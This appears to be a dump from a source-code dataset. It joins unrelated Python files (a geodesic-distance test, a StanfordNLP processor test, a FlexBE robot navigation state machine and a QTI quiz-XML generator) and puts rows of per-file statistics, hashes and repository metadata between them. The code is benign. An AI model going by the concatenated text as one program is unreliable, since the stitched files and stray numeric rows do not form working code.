from math import sqrt import torch from torch_geometric.utils import geodesic_distance def test_geodesic_distance(): pos = torch.Tensor([[0, 0, 0], [2, 0, 0], [0, 2, 0], [2, 2, 0]]) face = torch.tensor([[0, 1, 3], [0, 2, 3]]).t() out = geodesic_distance(pos, face) expected = [ [0, 1, 1, sqrt(2)], [1, 0, sqrt(2), 1], [1, sqrt(2), 0, 1], [sqrt(2), 1, 1, 0], ] assert torch.allclose(out, torch.tensor(expected)) assert torch.allclose(out, geodesic_distance(pos, face, num_workers=-1)) out = geodesic_distance(pos, face, norm=False) expected = [ [0, 2, 2, 2 * sqrt(2)], [2, 0, 2 * sqrt(2), 2], [2, 2 * sqrt(2), 0, 2], [2 * sqrt(2), 2, 2, 0], ] assert torch.allclose(out, torch.tensor(expected)) src = torch.tensor([0, 0, 0, 0]) dest = torch.tensor([0, 1, 2, 3]) out = geodesic_distance(pos, face, src=src, dest=dest) expected = [0, 1, 1, sqrt(2)] assert torch.allclose(out, torch.tensor(expected)) out = geodesic_distance(pos, face, src=src[0:1]) expected = [0, 1, 1, sqrt(2)] assert torch.allclose(out, torch.tensor(expected)) out = geodesic_distance(pos, face, dest=dest) expected = [0, 0, 0, 0] assert torch.allclose(out, torch.Tensor(expected))
30.395349
76
0.574598
202
1,307
3.663366
0.143564
0.027027
0.17973
0.178378
0.662162
0.467568
0.445946
0.394595
0.224324
0.224324
0
0.077778
0.24254
1,307
42
77
31.119048
0.669697
0
0
0.235294
0
0
0
0
0
0
0
0
0.176471
1
0.029412
false
0
0.088235
0
0.117647
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc021cb14dd8b84a0a6873924f2194048e2791f0
1,415
py
Python
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
"""This module tests Stanford NLP processors.""" import os import unittest from texar.torch import HParams from forte.pipeline import Pipeline from forte.data.readers import StringReader from forte.processors.stanfordnlp_processor import StandfordNLPProcessor from ft.onto.base_ontology import Token, Sentence class TestStanfordNLPProcessor(unittest.TestCase): def setUp(self): self.stanford_nlp = Pipeline() self.stanford_nlp.set_reader(StringReader()) models_path = os.getcwd() config = HParams({ "processors": "tokenize", "lang": "en", # Language code for the language to build the Pipeline "use_gpu": False }, StandfordNLPProcessor.default_hparams()) self.stanford_nlp.add_processor(StandfordNLPProcessor(models_path), config=config) self.stanford_nlp.initialize() # TODO @unittest.skip("We need to test this without needing to download models " "everytime") def test_stanford_processor(self): sentences = ["This tool is called Forte.", "The goal of this project to help you build NLP " "pipelines.", "NLP has never been made this easy before."] document = ' '.join(sentences) pack = self.stanford_nlp.process(document) print(pack)
36.282051
77
0.638869
152
1,415
5.848684
0.552632
0.074241
0.084364
0
0
0
0
0
0
0
0
0
0.279859
1,415
38
78
37.236842
0.872424
0.071378
0
0
0
0
0.16909
0
0
0
0
0.026316
0
1
0.066667
false
0
0.233333
0
0.333333
0.033333
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
fc045ba1073202cd1ab4f6738b3709fb28279ff8
5,008
py
Python
flexbe_navigation_states/src/flexbe_navigation_states/navigation_sm.py
amsks/generic_flexbe_states
f7be84105d3370c943ed17fc19af672b330726de
[ "BSD-3-Clause" ]
null
null
null
flexbe_navigation_states/src/flexbe_navigation_states/navigation_sm.py
amsks/generic_flexbe_states
f7be84105d3370c943ed17fc19af672b330726de
[ "BSD-3-Clause" ]
null
null
null
flexbe_navigation_states/src/flexbe_navigation_states/navigation_sm.py
amsks/generic_flexbe_states
f7be84105d3370c943ed17fc19af672b330726de
[ "BSD-3-Clause" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- ########################################################### # WARNING: Generated code! # # ************************** # # Manual changes may get lost if file is generated again. # # Only code inside the [MANUAL] tags will be kept. # ########################################################### from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger from flexbe_states.wait_state import WaitState from flexbe_navigation_states.turn_right_sm import turn_rightSM from flexbe_states.subscriber_state import SubscriberState from flexbe_utility_states.MARCO import Carbonara from flexbe_navigation_states.turn_left_sm import turn_leftSM from flexbe_navigation_states.go_straight_sm import go_straightSM from flexbe_navigation_states.obstacle_avoidance_sm import Obstacle_AvoidanceSM # Additional imports can be added inside the following tags # [MANUAL_IMPORT] # [/MANUAL_IMPORT] ''' Created on Sat Jul 18 2020 @author: TG4 ''' class NavigationSM(Behavior): ''' Integrated behaviour ''' def __init__(self): super(NavigationSM, self).__init__() self.name = 'Navigation' # parameters of this behavior # references to used behaviors self.add_behavior(turn_rightSM, 'turn_right') self.add_behavior(turn_leftSM, 'turn_left') self.add_behavior(go_straightSM, 'go_straight') self.add_behavior(go_straightSM, 'go_straight_2') self.add_behavior(go_straightSM, 'go_straight_3') self.add_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance') # Additional initialization code can be added inside the following tags # [MANUAL_INIT] # [/MANUAL_INIT] # Behavior comments: def create(self): # x:1683 y:419, x:605 y:337 _state_machine = OperatableStateMachine(outcomes=['finished', 'failed']) # Additional creation code can be added inside the following tags # [MANUAL_CREATE] # [/MANUAL_CREATE] with _state_machine: # x:58 y:69 OperatableStateMachine.add('w1', WaitState(wait_time=1), transitions={'done': 's1'}, 
autonomy={'done': Autonomy.Off}) # x:1090 y:488 OperatableStateMachine.add('turn_right', self.use_behavior(turn_rightSM, 'turn_right'), transitions={'finished': 'w2', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:55 y:196 OperatableStateMachine.add('s1', SubscriberState(topic='/darknet_ros/bounding_boxes', blocking=True, clear=False), transitions={'received': 'carb1', 'unavailable': 'w1'}, autonomy={'received': Autonomy.Off, 'unavailable': Autonomy.Off}, remapping={'message': 'detected'}) # x:286 y:212 OperatableStateMachine.add('carb1', Carbonara(), transitions={'none': 'go_straight', 'Obstacle': 'Obstacle_Avoidance', 'Left': 'go_straight_2', 'Right': 'go_straight_3'}, autonomy={'none': Autonomy.Off, 'Obstacle': Autonomy.Off, 'Left': Autonomy.Off, 'Right': Autonomy.Off}, remapping={'input_value': 'detected', 'Distance': 'Distance'}) # x:1180 y:246 OperatableStateMachine.add('w2', WaitState(wait_time=1), transitions={'done': 'w5'}, autonomy={'done': Autonomy.Off}) # x:1161 y:64 OperatableStateMachine.add('w5', WaitState(wait_time=1), transitions={'done': 'w1'}, autonomy={'done': Autonomy.Off}) # x:958 y:119 OperatableStateMachine.add('turn_left', self.use_behavior(turn_leftSM, 'turn_left'), transitions={'finished': 'w2', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:906 y:276 OperatableStateMachine.add('go_straight', self.use_behavior(go_straightSM, 'go_straight'), transitions={'finished': 'w2', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:679 y:118 OperatableStateMachine.add('go_straight_2', self.use_behavior(go_straightSM, 'go_straight_2'), transitions={'finished': 'turn_left', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:715 y:484 OperatableStateMachine.add('go_straight_3', self.use_behavior(go_straightSM, 'go_straight_3'), transitions={'finished': 'turn_right', 'failed': 
'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:381 y:495 OperatableStateMachine.add('Obstacle_Avoidance', self.use_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance'), transitions={'finished': 's1', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) return _state_machine # Private functions can be added inside the following tags # [MANUAL_FUNC] # [/MANUAL_FUNC]
34.777778
131
0.659145
550
5,008
5.8
0.292727
0.040752
0.028213
0.041379
0.396552
0.29373
0.261442
0.19185
0.168025
0.12163
0
0.027166
0.184105
5,008
143
132
35.020979
0.753549
0.179113
0
0.220588
1
0
0.189487
0.006923
0
0
0
0
0
1
0.029412
false
0
0.117647
0
0.176471
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc070f80801a319fdf697b23e027ce45aa2d558c
26,632
py
Python
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
1
2021-02-12T09:34:07.000Z
2021-02-12T09:34:07.000Z
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
null
null
null
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright (c) 2021, Dana Lehman # Copyright (c) 2020, Geoffrey M. Poore # All rights reserved. # # Licensed under the BSD 3-Clause License: # http://opensource.org/licenses/BSD-3-Clause # from .quiz import Quiz, Question, GroupStart, GroupEnd, TextRegion BEFORE_ITEMS = '''\ <?xml version="1.0" encoding="UTF-8"?> <questestinterop xmlns="http://www.imsglobal.org/xsd/ims_qtiasiv1p2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.imsglobal.org/xsd/ims_qtiasiv1p2 http://www.imsglobal.org/profile/cc/ccv1p2/ccv1p2_qtiasiv1p2p1_v1p0.xsd"> <assessment ident="{assessment_identifier}" title="{title}"> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_maxattempts</fieldlabel> <fieldentry>1</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> cc_profile </fieldlabel> <fieldentry> cc.exam.v0p1 </fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> qmd_assessmenttype </fieldlabel> <fieldentry> Examination </fieldentry> </qtimetadatafield> </qtimetadata> <section ident="root_section"> ''' AFTER_ITEMS = '''\ </section> </assessment> </questestinterop> ''' GROUP_START = '''\ <section ident="{ident}" title="{group_title}"> <selection_ordering> <selection> <selection_number>{pick}</selection_number> <selection_extension> <points_per_item>{points_per_item}</points_per_item> </selection_extension> </selection> </selection_ordering> ''' GROUP_END = '''\ </section> ''' TEXT = '''\ <item ident="{ident}" title="{text_title_xml}"> <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>text_only_question</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>0</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry></fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> 
<fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> <presentation> <material> <mattext texttype="text/html">{text_html_xml}</mattext> </material> </presentation> </item> ''' START_ITEM = '''\ <item ident="{question_identifier}" title="{question_title}"> ''' END_ITEM = '''\ </item> ''' ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM = '''\ <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>{question_type}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>{points_possible}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry>{original_answer_ids}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> <fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> ''' ITEM_METADATA_ESSAY = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM.replace('{original_answer_ids}', '') ITEM_METADATA_UPLOAD = ITEM_METADATA_ESSAY ITEM_PRESENTATION_MCTF = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_lid ident="response1" rcardinality="Single"> <render_choice> {choices} </render_choice> </response_lid> </presentation> ''' ITEM_PRESENTATION_MCTF_CHOICE = '''\ <response_label ident="{ident}"> <material> <mattext texttype="text/html">{choice_html_xml}</mattext> </material> </response_label>''' ITEM_PRESENTATION_MULTANS = ITEM_PRESENTATION_MCTF.replace('Single', 'Multiple') ITEM_PRESENTATION_MULTANS_CHOICE = ITEM_PRESENTATION_MCTF_CHOICE ITEM_PRESENTATION_SHORTANS = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> 
</presentation> ''' ITEM_PRESENTATION_ESSAY = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> </presentation> ''' ITEM_PRESENTATION_UPLOAD = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> </presentation> ''' ITEM_PRESENTATION_NUM = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib fibtype="Decimal"> <response_label ident="answer1"/> </render_fib> </response_str> </presentation> ''' ITEM_RESPROCESSING_START = '''\ <resprocessing> <outcomes> <decvar maxvalue="100" minvalue="0" varname="SCORE" vartype="Decimal"/> </outcomes> ''' ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK = '''\ <respcondition continue="Yes"> 
<conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_incorrect_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{answer_xml}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL = '''\ <varequal respident="response1">{answer_xml}</varequal>''' ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK = ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT = '''\ <varequal respident="response1">{ident}</varequal>''' 
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT = '''\ <not> <varequal respident="response1">{ident}</varequal> </not>''' ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK = 
ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY = '''\ <respcondition continue="No"> <conditionvar> <other/> </conditionvar> </respcondition> ''' ITEM_RESPROCESSING_END = '''\ </resprocessing> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL = '''\ <itemfeedback ident="general_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT = '''\ <itemfeedback ident="correct_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT = '''\ <itemfeedback ident="general_incorrect_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL = '''\ <itemfeedback ident="{ident}_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' def assessment(*, quiz: Quiz, assessment_identifier: str, title_xml: str) -> str: ''' Generate assessment XML from Quiz. 
''' xml = [] xml.append(BEFORE_ITEMS.format(assessment_identifier=assessment_identifier, title=title_xml)) for question_or_delim in quiz.questions_and_delims: if isinstance(question_or_delim, TextRegion): xml.append(TEXT.format(ident=f'text2qti_text_{question_or_delim.id}', text_title_xml=question_or_delim.title_xml, assessment_question_identifierref=f'text2qti_question_ref_{question_or_delim.id}', text_html_xml=question_or_delim.text_html_xml)) continue if isinstance(question_or_delim, GroupStart): xml.append(GROUP_START.format(ident=f'text2qti_group_{question_or_delim.group.id}', group_title=question_or_delim.group.title_xml, pick=question_or_delim.group.pick, points_per_item=question_or_delim.group.points_per_question)) continue if isinstance(question_or_delim, GroupEnd): xml.append(GROUP_END) continue if not isinstance(question_or_delim, Question): raise TypeError question = question_or_delim xml.append(START_ITEM.format(question_identifier=f'text2qti_question_{question.id}', question_title=question.title_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = ','.join(f'text2qti_choice_{c.id}' for c in question.choices) elif question.type == 'numerical_question': item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = f'text2qti_numerical_{question.id}' elif question.type == 'essay_question': item_metadata = ITEM_METADATA_ESSAY original_answer_ids = f'text2qti_essay_{question.id}' elif question.type == 'file_upload_question': item_metadata = ITEM_METADATA_UPLOAD original_answer_ids = f'text2qti_upload_{question.id}' else: raise ValueError #Type Change for Schoology CC Import if question.type == 'multiple_choice_question': typechange = 'cc.multiple_choice.v0p1' elif question.type == 'true_false_question': typechange = 'cc.true_false.v0p1' elif question.type == 'short_answer_question': 
typechange = 'cc.fib.v0p1' elif question.type == 'multiple_answers_question': typechange = 'cc.multiple_response.v0p1' elif question.type == 'essay_question': typechange = 'cc.essay.v0p1' else: typechange = question.type xml.append(item_metadata.format(question_type=typechange, points_possible=question.points_possible, original_answer_ids=original_answer_ids, assessment_question_identifierref=f'text2qti_question_ref_{question.id}')) if question.type in ('true_false_question', 'multiple_choice_question', 'multiple_answers_question'): if question.type in ('true_false_question', 'multiple_choice_question'): item_presentation_choice = ITEM_PRESENTATION_MCTF_CHOICE item_presentation = ITEM_PRESENTATION_MCTF elif question.type == 'multiple_answers_question': item_presentation_choice = ITEM_PRESENTATION_MULTANS_CHOICE item_presentation = ITEM_PRESENTATION_MULTANS else: raise ValueError choices = '\n'.join(item_presentation_choice.format(ident=f'text2qti_choice_{c.id}', choice_html_xml=c.choice_html_xml) for c in question.choices) xml.append(item_presentation.format(question_html_xml=question.question_html_xml, choices=choices)) elif question.type == 'short_answer_question': xml.append(ITEM_PRESENTATION_SHORTANS.format(question_html_xml=question.question_html_xml)) elif question.type == 'numerical_question': xml.append(ITEM_PRESENTATION_NUM.format(question_html_xml=question.question_html_xml)) elif question.type == 'essay_question': xml.append(ITEM_PRESENTATION_ESSAY.format(question_html_xml=question.question_html_xml)) elif question.type == 'file_upload_question': xml.append(ITEM_PRESENTATION_UPLOAD.format(question_html_xml=question.question_html_xml)) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question'): correct_choice = None for choice in question.choices: if choice.correct: correct_choice = choice break if correct_choice is None: raise TypeError resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if 
question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) else: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'short_answer_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}', answer_xml=choice.choice_xml)) varequal = [] for choice in question.choices: varequal.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL.format(answer_xml=choice.choice_xml)) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'multiple_answers_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: 
resprocessing.append(ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) varequal = [] for choice in question.choices: if choice.correct: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT.format(ident=f'text2qti_choice_{choice.id}')) else: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'numerical_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK) if question.correct_feedback_raw is None: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK else: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK xml.append(item_resprocessing_num_set_correct.format(num_min=question.numerical_min_html_xml, num_exact=question.numerical_exact_html_xml, num_max=question.numerical_max_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK) 
xml.append(ITEM_RESPROCESSING_END) elif question.type == 'essay_question': xml.append(ITEM_RESPROCESSING_START) xml.append(ITEM_RESPROCESSING_ESSAY) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) elif question.type == 'file_upload_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question', 'numerical_question', 'essay_question', 'file_upload_question'): if question.feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL.format(feedback=question.feedback_html_xml)) if question.correct_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT.format(feedback=question.correct_feedback_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT.format(feedback=question.incorrect_feedback_html_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): for choice in question.choices: if choice.feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL.format(ident=f'text2qti_choice_{choice.id}', feedback=choice.feedback_html_xml)) xml.append(END_ITEM) xml.append(AFTER_ITEMS) return ''.join(xml)
40.474164
260
0.629769
2,487
